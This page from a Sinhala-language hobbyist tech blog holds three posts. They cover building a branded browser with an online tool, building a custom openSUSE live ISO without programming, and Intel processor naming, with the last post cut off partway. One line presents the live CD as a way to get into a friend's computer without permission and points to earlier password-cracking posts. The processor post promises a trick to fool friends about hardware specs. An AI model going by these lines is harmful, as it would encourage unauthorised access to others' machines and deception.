සෑහෙන දවසකින් ඕං ජිලා සුපුරුදු නුහුරු නොවරදින ජිල්මාට්ස් කෙරුවාවක් උඹට කියන්නයි සූදානම. අහ්! ඊටත් කලින් උඹට සුභම සුභ ආරංචියක් තියනවා කියන්න...
…උඹේ ආදරණීය ජිල්මාට්ස් නොහොත් ජිලා පෞද්ගලික ජීවිතෙන් සර්ථක කඩයිමක් තැබුවා ඈ.. ඒ ජිලාගේ රාජකාරී සපයන ආයතනයකින් ජිලාට ස්ථිරපත්වීම ලබාදී හොද වැටුපකට හිමිකම ලබාදුන්නා.. දැන් බලයි "රාජකාරී සපයන ආයතනයකින්" කිව්වම ජිලාට තවත් රාජකාරි ආයතන තියනවද කියල... ඔව්.. ඇත්තෙන්ම ඔව්..තවත් ආයතනයකට සේවාව සපයනවා..ඉදිරියේදී තවත් වැදගත් ස්ථානයකට ජිලාගේ සේවය අවශ්‍යව තිබෙනවා... මීට අමතරව රාත්‍රී පාඨමාලා කිහිපයකුත් ජිලා පවත්වනවා.. ජිලාගේ මේ දියුණුවට උඹත් නිසැකවම ශක්තියක් උනා... මම නොදැනුවත්වම...උඹ නොදැනුවත්වම.. මගේ...උඹේ චිත්ත ශක්තිය සැබෑම පිටුවහලක් උනා... සැබෑම ශක්තියක් උනා... උඹ දැනුවත්ව හෝ නොදැනුවත්ව උඹ ජිලාට ආශිර්වාද කලා.. සුභපැතුවා.. ඒ මම දන්න දේවල් උඹලත් එක්ක නිර්ලෝභීව බෙදාහදාගත්තු නිසා... මම උගත්දේ උඹලට කියලදීපු නිසා.. ඔව් මම කැපවීම් කලා.. ගොඩාක්දේ ඉගෙනගත්තා.. ගොඩාක්දේ අත්හදාබැලුවා..පර්යේෂණය කලා.. මම සාර්ථක වූවා..  ඒවිතරක්ම ඇතිද මගේ ගමනට ඉහළට යන්න..? නෑ ඒකම ප්‍රමාණවත් නෑ... මම විශ්වාසකරනවා මම අදහන දෙවියනුත්.. මගේ රත්තරං අම්මිවත්.. ළග නොසිටියත් සිතින් මාළග නිතර රැදෙන මගේම රත්තරං තාත්තවත්... මගේම මහමොළකරුවන් දෙපළත්.. මගේ නෑදෑ පරපුරත්.. යහළුමිත්‍රාදීනුත්.. ෆේස්බුකියේදී නිතර මුණගැසෙන උඹවත්... ජිල්මාට්ස් බ්ලොගියෙන් හමුවන උඹවත්... මට ආශිර්වාද කරන්න ඇති.. සුභපතනවා ඇති... උඹල හැමෝටම පිං බං...
…ජිලා අද වෙනස් වෙලා... ගොඩාක් හැගීම්බරවෙලා... ඔව්.. ඒක ඇත්ත.. අද ජිල්මාට්ස්ගේ "කම්පියුටර් ජිල්මාට්ස් පාට්නම්බර් 50" මට අදවගේ මතකයි.. එදා මගේ මුල්ම පෝස්ටුව : "ලංකාවෙ ඉන්න හැකර් බයියලට බෑ අපේ facebook අකවුන්ට් හැක්කරන්න"
…මම මේ ජිල්මාට්ස් බ්ලොගිය ගැන ෆේස්බුකියෙන් ෆේස්බුකියේ යහළුවන් ඇමතුවා... ඒදවස්වල මේ හැකිං කතාව වගේම හැකර් බයියලා වැහි වැහැපුනිසා.. එදා ෆේස්බුකියෙන් කියූ status එකට හෙනගහන්නාවාගේ හෙනගෙඩිම කඩාපාත්වූවා... එක එකා අම්බානක බැන්නා... අදටත් මතකයි මගේ ෆේස්බුකියෙ වෝල් එකේ ලියූ ස්ටේට්ස්ටුවකට වැදුණ බැනුම් ප්‍රමාණය.. හෙනගහන්නාවාගේ බැනුම් තත්පරෙන් තත්පරයට එකක් වැදෙනවා... එතැනින් එකෙක් මම මගේ ළගින්ම ආශ්‍රය කරපු යහළුවෙක්.. මොනාකරන්නද..? ඒ අතරින් මගේ යහළුවන් කිහිපදෙනෙක් මගේ ගමනට ශක්තියක් උනා... අදටත් මම උන්ව සිහිකරනවා.. ලියපන් මචෝ බ්ලොග් එකක් කියල අතදුන්නෙත් ඒකාලයෙ හදුනගත්තු යහළුවෙක්...ඔව් අද ජිල්මාට්ස් බ්ලොගියත් ගොඩාක් දුර ඇවිදින්.. බොරු ට්‍රැෆික් නෑ... හොර ස්ක්‍රිප්ට් වලින් මනාප හිගාකෑවෙනෑ..අද ඒ ජිල්මාට්ස් යහළුවන් ලක්ෂයකටත් වඩා වැඩිප්‍රමාණයක් අතරෙ සැරිසරන්නක් වෙලා...
…ඇති වැඩි කතා ඇති.. උඹටත් සතුටුයි මටත් සතුටුයි...
…ළමයි.....
…අද මාතෘකාව "මට මගේම නොවන web browser එකක් හදාගැනීම"
…ඔයාලට කලින් මාතෘකාව මතකද..? මට මගේම නොවන මෙහෙයුම්පද්ධතියක් හදාගැනිල්ල"
…මතකනෙ පෝග්‍රැමිං දැනුම කිසිවක් නැතුව තමන්ගේම මෙහෙයුම්පද්ධතියක් හැදුවා,... ඒවගේමයි අදත්... පෝග්‍රැමිං දැනුම බිංදුවයි... ඒ වුනාට තමන්ගෙම කියල web browser එකකුත් හදනව.
…හුටා දැන් අහයි ජිලා කිව්වනෙ ෆේස්බුකියෙදි jilmarts web Browser එකක් හදමින් ඉන්නවා කියල..ඒ මේකද..? නෑ හත්වලාමේ මේනම් ඒක නෙවේ ඈ... jilmarts web broswer එක සම්පූර්ණවම ජිලාට උරුමයි... මේ දැන් ජිලා කියන්න යන්නෙ පෝග්‍රැමිං දැනුමක් නැතිව උඹට උඹේම නොවන web browser එකක් හදාගන්නා අයුරුයි ඈ..
…හලි හලි කතාව නැතිව දැන් වැඩට බහිමු...
…මුලින්ම යනවා මෙන්න මේ ලිංකුවට... රෙජිස්ටාර් කෙනෙක්ගාවට යෑමක් අනව්ශ්‍යයි ඈ...
http://www.makemybrowser.com/

හලි ඕං එහෙනම් රූප රාමුවලින්ම බලාගනිමුකො ඈ...
ස්ටෙප් 01 : ඕං මම ආවා http://www.makemybrowser.com ලින්කුවට ඈ...


ස්ටෙප් අංක ටූ : Start Now >>

ස්ටෙප් අංක ත්‍රී : ඔන්න ඉතිං කැමති තාලයේ නමක් දාගෙන කැමති තාලයේ ලෝගෝ එකක් බස්සවන්න ඕනි.

ස්ටෙප් අංක ෆෝ : ප්‍රධාන පිටුව මොකක්ද කියල bookmarks කිහිපයකුත් ඇඩ්කොරගන්න ඕනි... ආ... ජිලාගේ පිටුව ජිල්මාට්ස් බ්ලොග් අඩවිය bookmark නොකළොත් උඹට අපු ඈ... ඒනිසා මතක ඇතිව ජිල්මාට්ස්වත් බුක්මාක් කොරල මතකතියාගනින් ඈ...


ස්ටෙප් අංක ෆයිව් : ඔන්න දැන් ඔයාගෙ වෙබ් බ්‍රවුසර් එකට හොද theme එකක් දාගෙන Finish and download ඈ...මේං මේවගේ...
ස්ටෙප් අංක සික්ස් : මම මගේම නොවන  මගේ මෙව්වා එක පරිගණකයට ස්ථාපනය කිරීම...
ස්ටෙප් අංක සෙවන් : මම මගේම නොවන web browser එකෙන් ජිල්මාට්ස්ගේ මේ පෝස්ටුවට කමෙන්ටුවක් දැමීම...

…අහ්! උඹට කියන්න අමතක උනා.. උඹට උඹේම නොවන web browser එකට උඹ කලින් භාවිතකල Google Chrome web browser එකේ දමපු සෙල්ලම් මේ උඹේම නොවන මෙව්ව එකෙත් ඒවිදියටම දමන්න පුළුවන් ඈ... අමුතුවෙන් කිසිවක් කියන්න ඕනි නෑ ජිලා...
…ජිලා ජිලාගෙම අතින් නිමැවෙන මට මගේම වන ජිලාට ජිලාගේම web browser එකේ සවිස්තරාත්මකව හැසිරවීමක් ජිලාගේ ඒ නිමවුමෙන් පසුව උඹට කියලදෙන්නම්කො ඈ... ජිලාගේ web browser එක එනතුරු උඹ උඹේම නොවන මෙව්වා එකෙන් අන්තර්ජාලයේ එහාමෙහා සැරිසරමුකො ඈ..අද ජිලා නොහොත් උඹේම ආදරණීය මිත්‍රයා ගොඩාක් කාර්‍යබහුල චරිතයක් වෙලා...ඒනිසා හෙමිහෙමිහිට තමයි මේ සියලු වැඩකටයුතු අස්සෙ වෙබ් බ්‍රවුසර් එකේ වැඩකටයුතුත්... බ්ලොගියේ පෝස්ටුලිවීමේ ප්‍රමාදයත්.. ඉතිං කොතරම් කාර්‍යබහුල උනත් හැමදාමත් පුළුපුලුවන් විදියට ෆේස් බුකියටත් ඇවිදින් බුකියෙ මිත්‍රයින්ගෙ පරිගණක ආශ්‍රිතව මතුවන ගැටළුවලට උත්තර බදින්නෙ යහළුවෙකුට දන්නදෙයක් කියලදෙන්නම තියන කැසිල්ල නිසා.. ඒ කැසිල්ලම අද මට ශක්තියක්වෙලා..  ඒ කැසිල්ලේදී ශක්තියක් උන උඹට ජය!..

Friday, October 25, 2013

මට මගේම නොවන මෙහෙයුම්පද්ධතියක් හදාගැනිල්ල.. (කම්පියුටර් ජිල්මාට්ස් පාට්නම්බර් 49)

මට මගේම නොවන......... වහපන් ජිලෝ කට.. උඹත් දැන් අනික් එවුන්ගෙ ටෝක දෙන්න පටන් අරං වගේ... හිටු යකෝ කියල ඉවර වනකම්.. ඕං ආයෙමත් ඈ..
…මට මගේම නොවන මෙහෙයුම්පද්ධතියක් තියනවා........ අම්ම ගහයි... බැට් එකෙන්ද..? බෝලෙන්ද..? පොඩ්ඩක් හිටු කියනකම්.. මැද්දට නොපැන..
…ජිල්මාට්ස් ගෙ අතින්ම නිමවෙන jilmarts web browser එකේ වැඩ නිමවෙන්නත් කලින්ම jilmarts Operating System එකත් ජිලාගෙ ෆේස්බුකියෙ යහළුවන් එක්ක බෙදාහදාගත්තා කියල ජිලාගෙ බුකියෙ යහළුවන්ට නම් අමුත්තක් නෙවෙයි.. ඒත් බුකියෙ යහළුවන්ට පුරස්ණයක් උනේ ජිලාගෙ මීළග ජිල්මාට්ස් පෝස්ටුව මොකක්ද කියන එක.. ගොඩාක් එවුන් ජිලා ඔන්ලයින් එනතෙක් රැකල ඉදල වෙනදාට පුරස්ණ පත්තරයක් දිගහරිනව කලේ මීළග පෝස්ටුව මොකක්ද කියල ඉගියක්වත් දියන් මචෝ කියල.. ඒකට සමහර උන්ට ජිලාගෙන් ලැබුණ පිළිතුර උනේ ඒක බං උභතෝකෝටික ප්‍රශ්ණයක් කියල.. ඒත් සමහරුන් නම් ජිලාට බෝලෙ බස්සල විස්තරේ ඇද්ද... ඕං උත්තරේ... "මට මගේම නොවන මෙහෙයුම්පද්ධතියක්...".. ඒක ඉතින් ජිලාට නම් කිරිකජු වගේ.. මොකෝ ජිලා පෝග්‍රැමිං නොදන්න එකෙක් යැ.. ඉතිං එහෙව් එකාට මෙහෙයුම්පද්ධති සුළුදෙයක් කියලයි ගොඩක් එවුන් හිතුවේ... බලපන් යකෝ පෝස්ටුවේ මාතෘකාව... යකා කිව්වෙ උඹත් එක්ක තරහකට නෙවෙයි ඈ... ආදරේ වැඩි උනාම පිටවන වචන.. බලන්නකො ආයෙමත් පෝස්ටුවේ මාතෘකාව.. "මට මගේම නොවන මෙහෙයුම්පද්ධතියක් හදාගැනිල්ල..."
…ඉතිං මේක කියවන උඹට හිතෙන්නෙ මට මගේම... ඔව්... උඹට උඹේම...
…හත්වලාමයි ගොඩක් එවුන්ගෙ පෝග්‍රැමිං දැනුම අන්තිමයි නොවැ..
…පෝග්‍රැමිං දැනුම අනවශ්‍යයි.... මොකක්..? පෝග්‍රැමිං එපා.... ඔව් එපා...
…මෙන්න පෝග්‍රැමිං නැතිව මෙහෙයුම්පද්ධතියක් හැදිල්ලේ සූත්තරේ...
…අහ්!.. ඊට කලින් කියන්න ඕනි කරුණු කිහිපයක්ම ඈ...
…1. මේක මෙහෙයුම්පද්ධතියක්.. ඔව්  ඒක ඇත්ත..  විශේෂයි: මෙය Live CD එකක් ලෙසද භාවිත කල හැක.
…මොකක්ද මේ Live CD කතාව..?
…හිතන්න.. දැන් ඔයා භාවිතකරන මෙහෙයුම්පද්ධතිය කිසියම් හානියක් නිසා නැවත ස්ථාපනය කලයුතුවෙනවා... මළා.. ඔයාගෙ Desktop එක මත තිබුණ වටිනාකියන අනංමනං සේරෝම නැතිභංගස්ථාන වෙනවනේ... ඕං විසදුම... මේ කියන Live CD එකක් හරහා කරගන්න පුළුවන්... මේ Live CD එකක් කියන්නෙ CD තැටියක් හෝ DVD තැටියක් මතින් පමණක් මෙහෙයුම්පද්ධතිය ධාවනය කරවමින් (ස්ථාපනය කිරීමක් අවශ්‍ය නැත.) අදාළ කොටස් වල (මුළුමනින්ම Hard Disk Drive පිරික්සීමේ හැකියාව.) සැරිසැරීමේ හැකියාව ලබාදෙන්නක්.. 
…මතකද මීට කලින් ජිලා ජිල්මාට්ස් පෝස්ටුවකින්ම Windows Live CD එකක් හැදිල්ලක් ගැන උඹට කිව්වා... අමතක වෙන්න බැහැනෙ.. වැඩිදුර විස්තර එතනත් තියනවා ඈ..

…2. මේ හරහා ඔයාගෙම පරිගණකයේ ස්ථාපනයකරගැනීමේ හැකියාවත් තියනවා ඈ..  වයිරස් අප්පොලාට හාමිනේලාට  තහංචි පැනවූ ප්‍රදේශයක්...

…3. යහළුවෙකුගෙ පරිගණකයකට අනවසරයෙන් ඇතුළුවීමේ හැකියාවද ලබාදෙන්නක්..
…මතකයිනෙ මීට කලින් පෝස්ටුවලින් 100%ක්ම සාර්ථක මුරපද කැඩිලි සූත්තරත් කිහිපයක්ම ජිලා ජිල්මාට්ස් පෝස්ටු හරහා මුලින්ම ලෝකයාට කිව්වා...

4. අද ජිලාගේ ජිල්මාට්ස් පෝස්ටුවෙන් ඉතාසරලව උඹට උඹේම කියල මෙහෙයුම්පද්ධතියක් හදාගන්න කියලදෙන්න පිංතූර භාවිත කරන නිසා කථාමාලාව නවතාලීම.

…5. කතා ඇති දැන් වැඩට බැසීම...

…ඕං පෝග්‍රැමිං දැනුම කිසිවක් නොදන්න එකෙක් උනත් දැන් තමන්ගෙම කියල මෙහෙයුම්පද්ධතියක හිමිකරුවෙක් වෙන්නයි යන්නෙ ඈ...

හලි... මුලින්ම එබෙමු මෙන්න මේ ලිංකුවට... එබිල විතරක් මදි ඈ... රෙජිස්ටර් වෙන්නත් ඕනි... 
1, ඔන්න මම එබුවා... උඩතියන ලිංකුව..

2.මෙන්න මං මගේ ෆේස්බුකියේ ගිණුමෙන්ම රෙජිස්ටර් වෙන්නයි කල්පනාව ඈ...
3.   ඕං මම රෙජිස්ටර් වෙනව බුකිය ඕපන් කරගෙන,..
 4. දැං එනවා අපේ කෙරුවාවට උවමනාකරන තැන ඈ... මම Choose base a template යටතේ OpenSUSE 12.3 එකේ GNOME desktop කියන එකට ටික් එකක් ඈ...
5.ඔතැනම පහළින් Select your architecture එකට 32bit දෙනවා ඈ...  ඉන්පස්සෙ ඊටත් යටින් Name your appliance කියන එකට මගේ මෙහෙයුම්පද්ධතියට යොදන නම ඈ...
6.මෙන්න බොලේ වැඩේ... මගේ නමින් ... හලි හලි.. ඉවසමුකෝ තව තියනවා කොරන්න.. දැන් Software කියන එක select කොරපන්... මේං මේවගේ..
7.හලි ඔන්න දැන් වැටෙන්න ඕනි ඔක්කොම අරව මෙව්ව සොෆ්ට්වෙයාර් ඔතනිතමා ඇඩ්කොරන්න තියෙන්නෙ ඈ.... ඔය All Packages එකේ නොසෑහෙන්න තියනවා ඈ...
8.ඔන්න මම දැනට Mozilla Firefox එකතුකොලා... මගේම තනි නිමැවුමෙන් බිහිවෙන jilmarts web browser එක පසුකාලයක මගේම අතින් මගේම කෝඩිං වලින් මෙහෙයුම්පද්ධතියක් හැදෙන කාලෙක ඒකටම ඇඩ් කොරනවා.. අහ්! jilmarts web browser එක දැනටමත් සාර්ථකව නිමවෙමින් තියනනිසා හැකිතාක් ඉක්මනින් උඹලට ඒක හදන්න කියල දෙනව වෙනුවට උඹලට ඒක භාවිත කරන්න හුරුකරවනව ඈ... එතකම් Fiefox ඇඩ් කොලා...
9.හලි... දැන් Configuration tab එකෙන් General වෙත එනවා.. ඇවිදින් භාෂාව සහ වේලාව තීරණය කරනවා ඈ...

10.දැන් ඉතිං Configuration tab එකේම Personalize එකට ඈ... මෙන්න බොලේ Appliance logo එකයි Appliance Background එකත් වෙනස්කොරන්න...




11.දැන් එනවා Configuration tab එකේම Appliance එකට... ඇවිදින් Disk and Memory තමා ඈ... මෙකෙන් මෙතනදි කොරන්නෙ අපේ මේ මෙහෙයුම්පද්ධතියට අදාළව තිබියයුතු RAM එකේ සහ Hard Disk Drive capacity නිශ්චය කිරීමක් ඈ... ඔන්න මම ඒකත් කොලා...


12.ඔන්න දැන් තමා අවස්ථාව... මගේම..උඹේම මෙහෙයුම්පද්ධතිය ගොඩනගා ගන්න... දැන් Configuration tab එකෙන් Build tab එකට මාරුවෙනවා... Version එකත් දීගෙනම මට උවමනාව .iso format එක නිසා... (.iso කියන්නෙ ඉතිං CD / DVD පුච්චන එකෙන් බූටබල් විදියට CD /DVD එකක් හදාගන්න ඕනිමකරන format එක නොවැ... ) Default format කියන තැනට Live CD/DVD (iso) ලෙස දීල Build ඈ...
13.මෙන්න බොලේ මගේම මෙහෙයුම්පද්ධතිය හැදෙන ලස්සන............... ෂහ්! මරු ඈහ්....
14.මෙන්න මගේ අවසාන ප්‍රතිඵලේ....... Download කරගන්න......
 ඕං උඹ එහෙනම් මෙහෙයුම්පද්ධතියක හිමිකරුවෙක් උනා ඈ.... මගෙන් බොක්කෙන්ම ගලා එන උණු උණුවේම සුභපැතුම් ඈ...
…හලි.. දැන් මම උඹෙන් පුංචි ඉල්ලීමක් කරනවා...
…මේක ජිලාගෙ ජිල්මාට්ස් අඩවිය.. ජිලා මේව ලියන්නෙ කොහෙන්වත් උස්සල නෙවෙයි ඈ... සම්පූර්ණ අත්දැකීම්..අත්විදීම්... සහ ජිලාගේ මහා යෝධ ශක්තීන් දෙකක් වන ජිලාගේ මාමා සහ එයාගෙ පුතා ඒකියන්නෙ ජිලාගෙ මල්ලියා කෙනෙක් උන්ගෙන් ලබන දැනුම තමා උඹලත් එක්ක මේ බෙදාගන්නෙ... පුංචි සංධියේ පටන්ම මේ සූත්තර තමා ජිලාගෙ ලෝකය උනේ.. දන්න දේවල් කියල දෙන්න උඹත් එක්ක බෙදාගන්න තමයි ජිලාගේ මේ ජිල්මාට්ස් බ්ලොගිය ඉදිරියටත් එන්නෙ.. දැනුම බෙදන්න බෙදන්න තමන් සතුව තියන දැනුම් සම්භාරය වැඩිවනවා මිස අඩුවීමක් වෙන්නෙ නෑ... මේ ජිල්මාට්ස් බ්ලොගියේ සම්පූර්ණ කෙරුවාවන් උඹත් අතිසාර්ථකව කරන්න ඇති.. අනික් බ්ලොගි වල නොදුටු සාර්ථකත්වයේ වෙනස උඹ අදටත් දකිනව ඇති.. ඒ බ්ලොගි කොපි පේස්ට් කිරිල්ලකින් තොරව දැනුම උඹට දෙන නිසා.. සාර්ථක දැනුම උඹ ලබන නිසා.. ඉතිං උඹ වගේම තවත් එකෙක් අසාර්ථකව ලියවෙන බ්ලොගි පසුපස හඹායනව ඇති.. යන්න ඇති.. උඹ වෙනස වටහාගත්තු නිසා ජිල්මාට්ස් එක්ක නැවතුණා.. දැන් උඹට හති නෑ.. අන්න ඒවගේ තවත් එකෙක් ජිල්මාට්ස් අඩවියට ගොඩවෙන්න පාරකියපං.. ජිල්මාට්ස්ගේ දැනුම හැමෝම අතරේ බෙදාගනිමු.. දන්න දේ බෙදාගැනිල්ලෙන් මම ගොඩාක් දේ ඉපැයූවා..අදටත් උපයනවා... සල්ලි වගේම මනුස්සකම...
මම බ්ලොගිය විකුණලා සල්ලි උපයන එකෙක් නොවන නිසාත්.. අනුන්ගේ පෝස්ටු තමන්ගෙ වගේ නොකියන නිසාත්.. දන්නා ගොඩාක් දේවල් උඹට වගේම තවත් එකෙකුට දෙන්න තියන කැසිල්ල නිසාත්  නරකද ජිල්මාට්ස්ගෙ බ්ලොග් අඩවිය ගැන උඹේ යහළුවන්ටත් දැනගන්න උඹේ ෆේස්බුකියෙ ගිණුමෙන් හරි කමක්නෑ share කොලානම් ඈ... වැඩේ නරක නැහැනේ..

Tuesday, October 8, 2013

Processor එකට හොර උප්පැන්නයක්... (කම්පියුටර් ජිල්මාට්ස් පාට්නම්බර් 48)

අද ඔක්තෝබර් මස 09 වනදා... අද ජිලාට හරිම සන්තෝෂ දවසක්ලු ඈ... ඒවගේම ජිලාගෙ පොකැට්ටුවට බරවියදම් වගේම ජිලාගෙ බුකියෙ ගිණුමටත් සෑහෙන්න ස්ටේට්ස් වලින් ...කමෙන්ටු වලින්... මැසේජ්ජුවලින්  බර දවසක්ලු.. මොකද අද ජිලාගෙ උපන්දිනේ නොවැ... හලිම දුක්බරයි ඈ..
ඉතිං උපන්දිනේ දවසකවත් හොදවයින් තෑගි වගේම හෘදයාංගම සුභ පැතුම් ජිලාට ලැබෙනව වගේ ජිලත් ඉතිං ඔය එක එක යහළුවන්ට කෑම බීමකින් හරි සංග්‍රහකොරල ගෙදර ඇවිදින් බුකියටත් ගොඩවදින්න කලින්ම කල්පනා කලේ දුර ඈත පළාත්වල සිටින ජිලාගෙ අනික් යහළුවන්ට දෙන්න හොද තෑග්ගක්..පාටියක් කොහොම දෙන්නද කියල.. ඕං එතකොටයි මතක් උනේ.. මේ පහුගිය දවස් කිහිපයකම ජිලාගෙ යහළුවන්ව වගේම ලංකාවේ ගොඩාක් අයව හරකුන් කරල අන්න තන කාපිය කියල පෙන්වපෙන්ව අණකරපු තවත් හරකෙකුගේ තන කැවිල්ලට තිත තියල හොදවයින් මොළේට යමක් දුන්නොත් නරකදෑ කියල.
…උඹත් කාපන් හරකෝ තන.. මෙන්න මමත් කනවා තන.. බ්ලොග් ලියන්නම් වාලේ බ්ලොග් පෝස්ටු ලියන.. පේස්ට් කරන්නම් වාලේ බ්ලොග් පෝස්ටු කොපිකරන කිසිවක් හරිහැටි නොදත් තවත් එක් හපනෙකුගේ ක්‍රියාව ලොවට කියන්නයි මේ සූදානම... මඩ ගැසීමේ ව්‍යාපාර නවතා... ඒ බ්ලොගියේද හිමිකරු අමතා අසාර්ථක වූ ඒ පෝස්ටුව නිවැරදිකිරීමට ජිලා කිහිපවතාවක්ම ඒ බ්ලොගියේ හිමිකරුව සම්බන්ධකරගන්න ජිලා උත්සාහ කලේ ඒ පෝස්ටුවේම ඒ වරද නිවැරදිකර වෙනත් ජිල්මාට්ස් පෝස්ටුවක් උඹට දෙන බලාපොරොත්තුවෙන්... කොහෙද ඉතිං ඒ බ්ලොගියේ හිමිකරුට වුවමනා ශ්‍රීලාංකිකයා ගොනාට අන්දවමින් ඒ පෝස්ටුවම ඒ බ්ලොගියේ තියාගන්න... වරද පිළිගැනීමේ කැමැත්තක් ඇත්තෙම නෑ.. අන්තිමේදි ඔහුගේ කටින් පිටවූයේ "ඔයා ඔයාගෙ වැඩක් බලාගන්න... මගේ  ගමනට හරස්වීමෙන් වළකින්න" කියන එක.. ඔව්... ජිලා බොක්කෙන්ම එයාට සුභ පැතුවා... අදටත් බොක්කෙන්ම සුභපතනවා..නමුත් ඒ එයා යන අගාධයට තවත් එකෙක් කැන්දන් යන්නෙ නැතිනම්... උඹත් දන්නවා මමත් දන්නවා... ඔය වගේ යහළුවො උඹට වගේම මටත් අනන්තවත් හමුවෙලා තියනවා.. වල බහින්න උපන් හපන්නු.. තව එකෙක් වලට දාල.. මඩ ගොඩේ රිංගවල අන්තිමේදි ඌ විතරක් ගොඩට එනවා... මම දන්නවා දැන් එයා මේ ජිල්මාට්ස් බ්ලොගිය කියවනවා... ඌ උගේ වරද නිවැරදිකරගන්නවා.. නමුත් ඒ ලියපු පෝස්ටුව තවමත් එහෙමම... ඒ පෝස්ටුව බලන එවුන් තවමත් වලට බහිනවා..  ඉතිං ඇයි ඒකට බාධා... මම ලියනවා පුතෝ මගේ බ්ලොගියේ කියල චැට් එකෙන් කැපුණා... ඉතිං අද ඉතිරිය..
…ඒ පෝස්ටුවේ ප්‍රධාන මාතෘකාව "Core i9 Processor එකක් මගෙන් ඔයාලට.." හත්වලාමයි... මොකක්ද මේ හරුපෙ..? ඇහුවෙත් අදමද කොහෙද... ඌට වැරදිලාද..? ජිලාට වැරදිලාද..? නැතිනම් බලන අපිට වැරදිලාද..?  ජිලාට පෙනුන විදියටනම් ඒ ගණිත ශූරයෙක්... ඒ මෙහෙමනේ... දැනට තියන අලුත්ම processor වර්ග Core i3, Core i5, Core i7 නේ... ඕං මෙහෙමයි ගණිතමය අනුකල්පනය ඈ... 3, 5, 7, ... මීළගට කුමක්ද..? නිසැකවම 9 නේ ... ඒනිසා මීළගට Core i9 වෙන්න ඕනි... එහෙමද...? නෑ එහෙම නෑ... එහෙනම් මොකක්ද..?
දෙවරක් චක්කරේ දන්න එවුනුත් බ්ලොග් කලාව පටන් අරන් තියන කාලේ... උන්ගෙ එක එක නොදැනුවත්කමට දමන පෝස්ටු නිසා උඹේ විතරක් නෙවෙයි මගෙත් මනස විකෘති වෙනවා...ඒ  උන්දලෑට ළගට කතාකොට හොදට ලුණු ඇඹුල් ඇතිව කණට වගේම කටටත් මොනවාහරි වක්කොරන්න ඇත්නම් ෂෝයි කියල හිතෙන්න දැන් තමා... බ්ලොගිය පුරවන්න ඕනි කමටම.. ගූගල් දෙයියාගේ වගේම youtube මල්ලිගේ සරණ පතන එවුන්ට එවුන්ගේම සරණං ගච්චාමී... මට මොකෝ උඹ්ල මමත් එක්කනේ.. උන්ට බෑ ජිල්මාට්ස්ගෙ ගෝලයින්ට තණකවන්න.. ඒක ජිලා හොදාකාරවම දන්නවා... මේ සූත්තරේ දෙක වසර සමත් නංගිලා මල්ලිලාට කිරිකජුවගේ.. ඉතිං තවත් දෙක වසර සමත් මල්ලියෙකුගේ කතාවක් නිසා අපි කෝප නොවෙමු... ජිලත් එක්ක ඉන්න උඹ ඇත්ත දන්නවා... ඉතිං අපි ඇත්ත කතාකරමු..
…හ්ම්ම්ම්
Pentium Pro
Pentium II
Celeron
Pentium III
Pentium M
Celeron M
Pentium 4
Pentium D
Pentium Extreme Edition
 Xeon
Intel Core 2 Do
 Pentium Dual -Core
Core i3 ( Nehalem /Sandy Bridge / Ivy Bridge micro architecture )
Core i5  ( Nehalem /Sandy Bridge / Ivy Bridge micro architecture )
Core i7  ( Nehalem /Sandy Bridge / Ivy Bridge micro architecture )
ඕං ඔහොම මෙතැනට වෙනතෙක්ම ආවා ඈ... මෙතනදි මේ Pentium Pro ආරම්භය නෙවෙයි..මීට පෙරාතුරුව processor වර්ග කිහිපයක්ම නිකුත් උනා ඈ.. අනික ජිලා දැන් මෙතනදි වැඩිපුර දෙනාගෙ කටේ තියන Intel සමාගම විසින් නිකුත් කරන ලද Processor විතරයි දිගහැරියෙ ඈ... තවත් තියනවා AMD කියයි Atom කියයි.. ඒව සියල්ලක්ම ගැනම කතාකොරන්නත්  මෙතන දිගහරින එකත්  ජිලාටත් එක සැරින්ම මතකෙට එන්නෙ නෑ නොවැ. ඒනිසා ඒගැන සමාවෙයන් ඈ... හලි දැන් මේ Core i3, Core i5, Core i7 වලින් පසුව Core vPro කියල කෑල්ලක් මේං මේ Core i3, Core i5, Core i7 processor වලට ඈදමින් තවත් දියුණුවක් කරනවා... දන්නවනේ Core i3 කිව්වත් ඒකටත් වෙනම Model Number එකක් අනුව වර්ගීකරණය කරනවා කියල.
උදා: Core i7-3930K CPU වගේ.. ඉන්පස්සෙ Generation කතාවකුත් ඒ අස්සෙම... ඕං ඔය විදියට දැන් මේං මේ Core vPro ලෙස හදුන්වාදෙන්නෙ 4th generation එහෙමත් නැත්නම් හතරවන පරම්පරාව කියල ඈ.. ඕං කොහොමින් කොහොම හරි දැන් දෙවන පරම්පරාවෙන් තුන්වන පරම්පවාවටත් ඇවිදින්... දැන් හතරවන පරම්පරාවටත් ඇවිදින්... ජිලාටත් වඩා හොදින් සවිස්තරාත්මකව Intel සමාගම විසින්ම කිව්වොත් නරකක් වෙන එකක් නෑ කියල ඕං එහෙනම් ලංකාවෙ මිනිස්සු හරකුන්ට ගත්තු බ්ලොගි වලට හෙනගහත්වා කියල ආවඩා ආයුබෝවේවා කියලම මේං බැලුවනම්.... තුන්වන පරම්පරාවේ Intel Processors සම්පූර්ණ විස්තරේ සහ හතරවන පරම්පරාවේ processor සම්පූර්ණ විස්තරේ...   ඕං අප්පොච්චියේ processor එකක් මේදක්වා ගියපු දුර..
දැන් අර ජිලා කලින් කියූ බ්ලොගිය වගේම තවත් අඩවි මීට පෙරත් උඹ දැකල ඇති.. දැනට උඹේ ළග තියන processor එක පෙනුමට විතරක් තියන හොදම එකක් විදියට පෙන්වන ක්‍රම... හැබැයි මතකද..? එදා ඔයා ඒ අත්විදීම... ඇස්බැන්දුම කලේ ඒ සුළුමොහොතකට විතරක් කියල.. ඒකියන්නෙ.. ඒ සූත්තරේ කරපු වෙලාවෙ ඉදන් කම්පියුටර් එක shutdown කරනතුරු පමණක්ම එය ඇස්බැන්දුමක් වුනා... ලස්සනයි යහළුවන්ව ගොනාට අන්දවන්න... ඒත් නැවතත් කම්පියුටරේ on කරද්දි ඒ කරපු සූත්තරේ අතුරුදහන් වෙලා... ඒකියන්නෙ ඒ සූත්තරේ අසාර්ථකයි කියන එකම නේද..? ඕං ඔය අසාර්ථකයි කියන සූත්තරේ සාර්ථක පෝස්ටුවක් කරන්නයි ජිලාගේ මේ උපන්දිනයදා වෑයම...ඇස්බැන්දුම් සදාකාලිකං...  ඒත් දන්න එකා දන්නවා මොකක්ද ඇත්ත කියලා... සාමාන්‍යයෙන් motherboard එකක් අනුඅංකයකින් නියෝජනය වනවා,... සෑම motherboard එකකටම තියෙන සෑම processor එකක්මත් ගැළපෙන්නෙ නෑ කිව්වොත් පිළිගන්නවානේද..? හ්ම්ම්ම් මෙහෙම ජිලා කිව්වොත්... motherboard එකට processor එක සවිවීමේ කොටසක් 